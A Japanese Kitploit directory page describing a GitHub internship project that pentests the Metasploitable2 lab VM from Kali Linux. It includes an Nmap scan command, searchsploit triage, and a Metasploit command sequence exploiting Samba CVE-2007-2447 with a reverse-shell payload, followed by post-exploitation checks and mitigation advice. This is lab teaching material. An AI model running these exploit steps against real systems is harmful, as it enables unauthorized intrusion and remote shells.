Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Penetration-Testing-on-Metasploitable2 — ハンズオンペンテストプロジェクト(Kali Linux vs Metasploitable2)。完全なワークフローを含む:Nmapスキャン、列挙、Metasploitによるエクスプロイト(Samba CVE-2007-2447)、ポストエクスプロイト検証、および緩和策。リポジトリにはコマンド、出力、レポートが含まれており、攻撃手法と防御策の両方を示している。 | Kitploit
ツール/GitHubGitHub/seifeldienahmad/penetration-testing-on-metasploitable2
偵察脆弱性スキャナーネットワークマッピング脆弱性分析エクスプロイトポストエクスプロイトペネトレーションテスト学習と教育ラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubseifeldienahmad/penetration-testing-on-metasploitable2

Penetration-Testing-on-Metasploitable2

ハンズオンペンテストプロジェクト(Kali Linux vs Metasploitable2)。完全なワークフローを含む:Nmapスキャン、列挙、Metasploitによるエクスプロイト(Samba CVE-2007-2447)、ポストエクスプロイト検証、および緩和策。リポジトリにはコマンド、出力、レポートが含まれており、攻撃手法と防御策の両方を示している。

リポジトリを見るウェブサイト
1131年前未レビュー

インターンシッププロジェクト2 — Metasploitable2 へのペネトレーションテスト

  • 概要: このプロジェクトは、完全なペネトレーションテストのワークフロー(偵察、列挙、エクスプロイト、ポストエクスプロイト検証、緩和策の推奨)を示します。使用したターゲットは Metasploitable2、攻撃ボックスは Kali Linux です。

  • ツール: Kali Linux (攻撃者) Nmap (偵察) Metasploit Framework (エクスプロイト) SearchSploit / Exploit-DB (トリアージ)

実行手順:

  1. スキャン: sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x 特定したサービス(例):vsftpd 2.3.4(ポート21バナー)、Samba smbd 3.x(ポート445)。
  2. 列挙とトリアージ: searchsploit --nmap scans/target.xml searchsploit samba 3.0.20 サービスと潜在的なエクスプロイト(vsftpd バックドア、Samba username-map)をマッチング。
  3. エクスプロイト
  • vsftpd バックドア (CVE-2011-2523) を試行 — Nmap バナーは存在したがサービス応答なし、エクスプロイトはセッションを生成せず。
  • Samba (CVE-2007-2447) のエクスプロイト成功:
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.x.x
set payload cmd/unix/reverse
set LHOST <kali-ip>
set LPORT 4444
exploit
対話型シェルを取得し、ユーザーコンテキストを確認。

4. ポストエクスプロイト

  • システム情報の確認: id uname -a
  • 証拠とスクリーンショットを収集。
  1. 緩和策の推奨
  • 定期的なスキャンと資産管理。
  • 迅速なパッチ適用とバージョンアップグレード(Sambaの更新)。
  • 重要なポートへのアクセス制限(ファイアウォールルール)。
  • 未使用サービスの無効化と匿名アクセスの禁止。
  • 共有とアカウントへの最小権限の適用。
  • ネットワークのセグメンテーションとログ/監視。
  • インシデント対応計画の策定。

結果 Samba エクスプロイトを介してリモートシェルを取得し、攻撃経路を文書化し、緩和計画を作成しました。完全なログとコマンド出力は scans/ フォルダに保存されています。

ツールをダウンロード